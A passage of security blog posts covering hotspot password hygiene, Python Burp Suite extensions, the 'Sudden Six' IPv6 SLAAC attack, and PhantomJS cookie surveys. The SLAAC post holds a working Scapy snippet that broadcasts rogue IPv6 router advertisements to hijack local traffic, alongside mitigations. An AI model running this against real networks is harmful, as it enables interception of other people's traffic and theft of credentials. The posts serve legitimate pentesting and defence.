Even though this is probably fairly obvious, having a complex password is just about the most important component of securing your mobile hotspot. A common myth is that since your hotspot is only on when you need access, it’s not likely that an attacker will guess your passcode in the allotted time frame. However, with the way WPA works, an attacker only needs enough time to capture the handshake; then they can attempt to crack the password offline. There are many different good (and bad) methods for coming up with complex passwords. However, given that the nature of a mobile hotspot is to turn it on only when needed, my recommendation is to strive for a passcode that’s complex enough, and to change the passcode every time you use your hotspot. The goal is that your passcodes are complex enough that an attacker cannot reasonably crack them in the allotted time, and even if they wanted to crack one offline, the cracked passcode would be useless because it will have changed the next time you use your hotspot. The challenge then becomes coming up with a complex enough password every time you go to use your hotspot. In cases like this, I am a big fan of the strategy put together over at XKCD.com, which is to take four random common words and put them together to form the password. For example, orange + finger + core + sleepy. This makes passwords easy to come up with, as well as remember, while providing enough entropy that an attacker couldn’t reasonably crack them.
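If you want to automate that four-random-words approach, a few lines of Python will do it; the wordlist path below is an assumption (any list of a few thousand common words works), and the secrets module keeps the selection cryptographically random.

    # Minimal XKCD-style passphrase generator. The wordlist path is an
    # assumption; any list of a few thousand common words will do.
    import secrets

    with open("/usr/share/dict/words") as f:
        words = [w.strip().lower() for w in f
                 if w.strip().isalpha() and 3 <= len(w.strip()) <= 8]

    passphrase = " ".join(secrets.choice(words) for _ in range(4))
    print(passphrase)   # e.g. "orange finger core sleepy"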

4. Turn It Off When Done

This one may seem a bit obvious as well, but since I’m even guilty of this one, I thought it was worthy enough for its own section. Turning the hotspot off when you aren’t using it is not only easier on your data usage (and monthly charges), but also shrinks the window a potential attacker has to attempt hijacking access to your hotspot. Now, if you’re as absent-minded as I am, many hotspots come with an inactivity timeout option, which will automatically shut it off after X minutes of inactivity.

Inactivity Timeout

5. Avoid The Defaults

This is more of a blanket statement that touches on the other tips as well: most of the default settings for your mobile hotspot should be changed, with WPA2 security being just about the only exception. Changing the default passcode is the most important, even if that passcode meets the complexity requirements in tip 3, as it’s possible the default is re-used across devices and already part of an attacker’s dictionary.

Complete Settings

That’s it! Follow these tips as a best practice and enjoy the freedom of high-speed Internet anywhere you go (or at least anywhere you have 4G). If you have any questions or comments, feel free to connect with me through Twitter @tehcolbysean.

Burp Extensions in Python & Pentesting Custom Web Services

A lot of my work lately has involved assessing web services; some are relatively straightforward REST and SOAP type services, but some of the most interesting and challenging involve varying degrees of additional requirements on top of a vanilla protocol, or entirely proprietary text-based protocols on top of HTTP. Almost without fail, the services require some extra twist in order to interact with them; specially crafted headers, message signing (such as HMAC or AES), message IDs or timestamps, or custom nonces with each request.

These kinds of unusual, one-off requirements can really take a chunk out of assessment time. Either the assessor spends a lot of time manually crafting or tampering with requests using existing tools, or spends a lot of time implementing and debugging code to talk to the service, then largely throws it away after the assessment. Neither is a very good use of time.

Ideally, we’d like to write the least amount of new code in order to get our existing tools to work with the new service. This is where writing extensions to our preferred tools becomes massively helpful: a very small amount of our own code handles the unusual aspects of the service, and then we’re able to take advantage of all the nice features of the tools we’re used to as well as work almost as quickly as we would on a service that didn’t have the extra proprietary twists.

Getting Started With Burp Extensions

Burp is the de facto standard for professional web app assessments and with the new extension API (released December 2012 in r1.5.01) a lot of complexity in creating Burp extensions went away. Before that the official API was quite limited and several different extension-building-extensions had stepped in to try to fill the gap (such as Hiccup, jython-burp-api, and Buby); each individually was useful, but collectively it all resulted in confusing and contradictory instructions to anyone getting started. Fortunately, the new extension API is good enough that developing directly against it (rather than some intermediate extension) is the way to go.

The official API supports Java, Python, and Ruby equally well. Given the choice I’ll take Python any day, so these instructions will be most applicable to the parseltongues.  Getting set up to use or develop extensions is reasonably straightforward (the official Burp instructions do a pretty good job), but there are a few gotchas I’ll try to point out along the way.

  1. Make sure you have a recent version of Burp (at least 1.5.01, but preferably 1.5.04 or later where some of the early bugs were worked out of the extensions support), and a recent version of Java
  2. Download the latest Jython standalone jar. The filename will be something like “jython-standalone-2.7-b1.jar” (even though the 2.7 branch is in beta, I found it plenty stable for my use; make sure to get it so that you can use Python 2.7 features in your extensions).
  3. In Burp, switch to the Extender tab, then the Options sub-tab. Now, configure the location of the jython jar.
  4. Burp indicates that it’s optional, but go ahead and set the “Folder for loading modules” to your python site-packages directory; that way you’ll be able to make use of any system wide modules in any of your custom extensions (requests, passlib, etc). (NOTE: Some Burp extensions expect that this path will be set to the their own module directory. If you encounter errors like “ImportError: No module named Foo”, simply change the folder for loading modules to point to wherever those modules exist for the extension.)
  5. The official Burp docs include one other important step:

    Note: Because of the way in which Jython and JRuby dynamically generate Java classes, you may encounter memory problems if you load several different Python or Ruby extensions, or if you unload and reload an extension multiple times. If this happens, you will see an error like:

    java.lang.OutOfMemoryError: PermGen space

    You can avoid this problem by configuring Java to allocate more PermGen storage, by adding a -XX:MaxPermSize option to the command line when starting Burp. For example:

    java -XX:MaxPermSize=1G -jar burp.jar

  6. At this point the environment is configured; now it’s time to load an extension. The default one in the official Burp example does nothing (it defines just enough of the interface to load successfully), so we’ll go one step further. Since several of our assessments lately have involved adding some custom header or POST body element (usually for authentication or signing), that seems like a useful direction for a “Hello World”. Here is a simple extension that inserts data (in this case, a timestamp) as a new header field and at the end of the body (as a Gist for formatting). Save it somewhere on disk.
    # These are java classes, being imported using python syntax (Jython magic)
    from burp import IBurpExtender
    from burp import IHttpListener
    
    # These are plain old python modules, from the standard library
    # (or from the "Folder for loading modules" in Burp>Extender>Options)
    from datetime import datetime
    
    class BurpExtender(IBurpExtender, IHttpListener):
    
        def registerExtenderCallbacks(self, callbacks):
            self._callbacks = callbacks
            self._helpers = callbacks.getHelpers()
            callbacks.setExtensionName("Burp Plugin Python Demo")
            callbacks.registerHttpListener(self)
            return
    
        def processHttpMessage(self, toolFlag, messageIsRequest, currentRequest):
            # only process requests
            if not messageIsRequest:
                return
            
            requestInfo = self._helpers.analyzeRequest(currentRequest)
            timestamp = datetime.now()
            print "Intercepting message at:", timestamp.isoformat()
            
            headers = requestInfo.getHeaders()
            newHeaders = list(headers) #it's a Java arraylist; get a python list
            newHeaders.append("Timestamp: " + timestamp.isoformat())
            
            bodyBytes = currentRequest.getRequest()[requestInfo.getBodyOffset():]
            bodyStr = self._helpers.bytesToString(bodyBytes)
            newMsgBody = bodyStr + timestamp.isoformat()
            newMessage = self._helpers.buildHttpMessage(newHeaders, newMsgBody)
            
            print "Sending modified message:"
            print "----------------------------------------------"
            print self._helpers.bytesToString(newMessage)
            print "----------------------------------------------\n\n"
            
            currentRequest.setRequest(newMessage)
            return
    
  7. To load it into Burp, open the Extender tab, then the Extensions sub-tab. Click “Add”, and then provide the path to where you downloaded it.
  8. Test it out! Any requests sent from Burp (including Repeater, Intruder, etc) will be modified by the extension. Output is directed to the tabs in the Extender>Extensions view.

A request has been processed and modified by the extension (timestamps added to the header and body of the request). Since Burp doesn’t currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension’s tab.

This is a reasonable starting place for developing your own extensions. From here it should be easy to play around with modifying the requests however you like: add or remove headers, parse or modify XML or JSON in the body, etc.

It’s important to remember as you’re developing custom extensions that you’re writing against a Java API. Keep the official Burp API docs handy, and be aware of when you’re manipulating objects from the Java side using Python code. Java to Python coercions in Jython are pretty sensible, but occasionally you run into something unexpected. It sometimes helps to manually take just the member data you need from complex Java objects, rather than figuring out how to pass the whole thing around other python code.

To reload the code and try out changes, simply untick then re-tick the “Loaded” checkbox next to the name of the extension in the Extensions sub-tab (or CTRL-click).

Jython Interactive Console and Developing Custom Extensions

Between the statically-typed Java API and playing around with code in a regular interactive Python session, it’s pretty quick to get most of a custom extension hacked together. However, when something goes wrong, it can be very annoying to not be able to drop into an interactive session and manipulate the actual Burp objects that are causing your extension to bomb.

Fortunately, Marcin Wielgoszewski’s jython-burp-api includes an interactive Jython console injected into a Burp tab. While I don’t recommend developing new extensions against the unofficial extension-hosting-extensions that were around before the official Burp API (in 1.5.01), access to the Jython tab is a pretty killer feature that stands well on its own.

You can install the jython-burp-api just as with the demo extension in step 6 above. The extension assumes that the “Folder for loading modules” (from step 4 above) is set to its own Lib/ directory. If you get errors such as “ImportError: No module named gds“, then either temporarily change your module folder, or use the solution noted here to have the extension fix up its own path.

Once that’s working, it will add an interactive Jython shell tab into the Burp interface.

jython_interpreter

This shell was originally intended to work with the classes and objects defined in jython-burp-api, but it’s possible to pull back the curtain and get access to the exact same Burp API that you’re developing against in standalone extensions.

Within the pre-defined “Burp” object is a reference to the Callbacks object passed to every extension. From there, you can manually call any of the methods available to an extension. During development and testing of your own extensions, it can be very useful to manually try out code on a particular request (which you can access from the proxy history via getProxyHistory()). Once you figure out what works, that code can go into your extension.
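For example, a quick poke at the most recent proxied request might look like the sketch below. The exact name under which the console exposes the callbacks reference varies between jython-burp-api versions (dir(Burp) will show what’s available), so treat Burp.callbacks here as an assumption; everything after that is the same official Burp API used in standalone extensions.

    # Interactive sketch inside the Jython tab. 'Burp.callbacks' is an
    # assumption; use dir(Burp) to find the real attribute in your version.
    callbacks = Burp.callbacks
    helpers = callbacks.getHelpers()

    history = callbacks.getProxyHistory()      # array of IHttpRequestResponse
    item = history[len(history) - 1]           # most recent proxied item

    info = helpers.analyzeRequest(item)        # IRequestInfo
    print info.getUrl()
    print list(info.getHeaders())              # Java list -> Python list

    body = item.getRequest()[info.getBodyOffset():]
    print helpers.bytesToString(body)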

jython_shell1

Objects from the official Burp Java API can be identified by their lack of help() strings and the obfuscated type names, but python-style exploratory programming still works as expected: the dir() function lists available fields and methods, which correspond to the Burp Java API.

Testing Web Services With Burp and SoapUI

When assessing custom web services, what we often get from customers is simply a spec document, maybe with a few concrete examples peppered throughout; actual working sample code, or real proxy logs are a rare luxury. In these cases, it becomes useful to have an interface that will be able to help craft and replay messages, and easily support variations of the same message (“Message A (as documented in spec)”, “Message A (actually working)”, “testing injections into field x”, “testing parameter overload of field y”, etc). While Burp is excellent at replaying and tampering with existing requests, the Burp interface doesn’t do a great job of helping to craft entirely new messages, or helping keep dozens of different variations organized and documented.

For this task, I turn to a tool familiar to many developers, but rather less known among pentesters: SoapUI. SoapUI calls itself the “swiss army knife of [web service] testing”, and it does a pretty good job of living up to that. By proxying it through Burp (File>Preferences>Proxy Settings) and using Burp extensions to programmatically deal with any additional logic required for the service, you can use the strengths of both and have an excellent environment for security testing against services. SoapUI Pro even includes a variety of web-service-specific payloads for security testing.


The main SoapUI interface, populated for penetration testing against a web service. Several variations of a particular service-specific POST message are shown, each demonstrating and providing easy reproducibility for a discovered vulnerability.

If the service offers a WSDL or WADL, configuring SoapUI to interact with it is straightforward: start a new project, paste in the URL of the endpoint, and hit OK. If the service is a REST service, or some other mechanism over HTTP, you can skip the validation checks and simply start creating requests manually by ticking the “Add REST Service” box in the “New SoapUI Project” dialog.

Create, manage, and send arbitrary HTTP requests without a “proper” WSDL or service description by telling SoapUI it’s a REST service.

In addition to helping you create and send requests, I find that the SoapUI project file is an invaluable resource for future assessments of the same service; any other tester can pick up right where I left off (even months or years later) by loading my Burp state and my SoapUI project file.

Share Back!

This should be enough to get you up and running with custom Burp extensions to handle unusual service logic, and with SoapUI to craft and manage large numbers of example messages and payloads. For Burp, there are tons of tools out there, including the official Burp examples, burpextensions.com, and plenty more findable on GitHub. Make sure to share other useful extensions, tools, or tricks in the comments, or hit me up to discuss: @coffeetocode or @neohapsis.

Picking Up The SLAAC With Sudden Six

By Brent Bandelgar and Scott Behrens

The people who run the Internet have been clamoring for years for increased adoption of IPv6, the next-generation Internet Protocol. Modern operating systems, such as Windows 8 and Mac OS X, come out of the box ready and willing to use IPv6, but most networks still run only IPv4. This is a problem because the administrators of those networks may not be expecting any IPv6 activity, and may have only IPv4 monitoring and defenses in place.

In 2011, Alec Waters wrote a guide on how to take advantage of the fact that Windows Vista and Windows 7 were configured out of the box to support IPv6. Dubbed the “SLAAC Attack”, his guide described how to set up a host that advertised itself as an IPv6 router, so that Windows clients would prefer to send their requests to this rogue IPv6 router first, which would then forward the requests to the legitimate IPv4 router on their behalf.

This past winter, we at Neohapsis Labs tried to recreate the SLAAC Attack to test it against Windows 8 and make it easy to deploy during our own penetration tests.

We came up with a set of standard packages and accompanying configuration files that worked, then created a script to automate this process, which we call “Sudden Six.” It can quickly create an IPv6 overlay network and the intermediate translation to IPv4 with little more than a base Ubuntu Linux or Kali Linux installation, an available IPv4 address on the target network, and about a minute or so to download and install the packages.

Windows 8 on Sudden Six

As with the SLAAC Attack described by Waters, this works against networks that have only IPv4 connectivity and no IPv6 infrastructure or defenses deployed. The attack establishes a transparent IPv6 network on top of the IPv4 infrastructure. Because many operating systems prefer IPv6 when it is available, an attacker can force those hosts to route their traffic over the rogue IPv6 infrastructure and then intercept or modify that communication.
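
To show the core primitive, here’s a hedged Scapy sketch of the kind of rogue Router Advertisement such an attack relies on. This illustrates the technique, not the Sudden Six tool itself; the interface name and the documentation prefix are placeholders:

# Illustration only (requires root): advertise ourselves as an IPv6 router so that
# SLAAC-enabled hosts on the local segment autoconfigure addresses and prefer us.
from scapy.all import (IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo,
                       ICMPv6NDOptSrcLLAddr, get_if_hwaddr, send)

iface = "eth0"             # attacker-controlled interface (placeholder)
prefix = "2001:db8:1::"    # documentation prefix used as a placeholder

ra = (IPv6(dst="ff02::1") /                                           # all-nodes multicast
      ICMPv6ND_RA(routerlifetime=1800) /                              # "I am a router"
      ICMPv6NDOptPrefixInfo(prefix=prefix, prefixlen=64, L=1, A=1) /  # let hosts SLAAC from this prefix
      ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)))

send(ra, iface=iface, loop=1, inter=5)                                # re-advertise every 5 seconds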

To boil it down, attackers can fairly easily weaponize this: by pretending to be an IPv6 router on your network, they can see all of your web traffic, including data sent to and from your machine. Even more lethal, they could modify the web pages you receive to launch client-side attacks, for example serving fake versions of the sites you are trying to reach that send everything you enter (usernames, passwords, credit card numbers) back to the attacker.

As an example, we can imagine this type of attack being used to snoop on the web traffic of employees browsing web sites, or to tamper with those pages in transit.

The most extreme way to mitigate the attack is to disable IPv6 on client machines. In Windows, this can be done manually in each network adapter’s Properties panel or centrally via Group Policy (GPO). Unfortunately, this would hinder IPv6 adoption. Instead, we would like to see more IPv6 networks being deployed, along with the defenses described in RFC 6105 and the Cisco First Hop Security Implementation Guide. These include features such as RA Guard, which lets administrators designate trusted switch ports (those leading to the legitimate IPv6 router) from which IPv6 Router Advertisements will be accepted, while RAs arriving on other ports are dropped.

At DEF CON 21, Brent Bandelgar and Scott Behrens will be presenting this attack as well as recommendations on how to protect your environment. You can find a more detailed abstract of our talk here. The talk will be held during Track 2 on Friday at 2 pm. In addition, on Friday we will be releasing the tool on the Neohapsis Github page.

Collecting Cookies with PhantomJS

TL;DR: Automate WebKit with PhantomJS to get specific Web site data.

This is the first post in a series about gathering Web site reconnaissance with PhantomJS.

My first major engagement with Neohapsis involved compiling a Web site survey for a global legal services firm. The client was preparing for a compliance assessment against Article 29 of the EU Data Protection Directive, which details disclosure requirements for user privacy and usage of cookies. The scope of the engagement involved working from their provided list of IP addresses and domain names to validate which Web sites and redirects were active or inactive, count how many first-party and third-party cookies each site placed, identify any login forms, and determine whether each site linked to a privacy policy and a cookie policy.

The list was extensive and the team had a hard deadline. We had a number of tools at our disposal to scrape Web sites, but since we had a specific set of attributes to look for, we determined that our best bet was to use a modern browser engine to capture fully rendered pages and try to automate the analysis. My colleague, Ben Toews, contributed a script towards this effort that used PhantomJS to visit a text file full of URLs and capture the cookies into another file. PhantomJS is a distribution of WebKit that is intended to run in a “headless” fashion, meaning that it renders Web pages and scripts like Apple Safari or Google Chrome, but without an interactive user interface. Instead, it runs on the command line and exposes a JavaScript API for driving it. I was able to build on this script to produce a list of active and inactive URLs by checking the status callback from page.open, and to capture the cookies from every active URL as stored in the page.cookies property.

Remember how I said that PhantomJS would render a Web page like Safari or Chrome? This was very important to the project, as I needed to capture the Web site attributes the same way a typical user would encounter the site. We needed to account for redirects from either the Web server or from JavaScript, and for any first- or third-party cookies along the way. As it turns out, PhantomJS provides a way to capture URL changes with the page.onUrlChanged callback, which I used to log the redirects and the final destination URL. The page.cookies attribute includes all first- and third-party cookies without any additional work, since PhantomJS already makes all of the needed requests and executes the scripts. Check out my version of the script in chs2-basic.coffee.

This is the command invocation. It takes two arguments: a text file with one URL per line and a file name prefix for the output files.


phantomjs chs2-basic.coffee [in.txt] [prefix]

This snippet writes out the cookies into a JSON string and appends it to an output file.

# assumes the PhantomJS modules are already loaded earlier in the script:
#   fs = require 'fs'
#   system = require 'system'
if status is 'success'
  # output JSON of cookies from the page, one JSON string per line
  # format: url: (requested URL from input), pageURL: (resolved location from the PhantomJS "address bar"), cookie: (cookies set on the page)
  fs.write system.args[2] + ".jsoncookies", JSON.stringify({url: url, pageURL: page.url, cookie: page.cookies}) + "\n", 'a'

In a followup post, I’ll discuss how to capture page headers and detect some common platform stacks.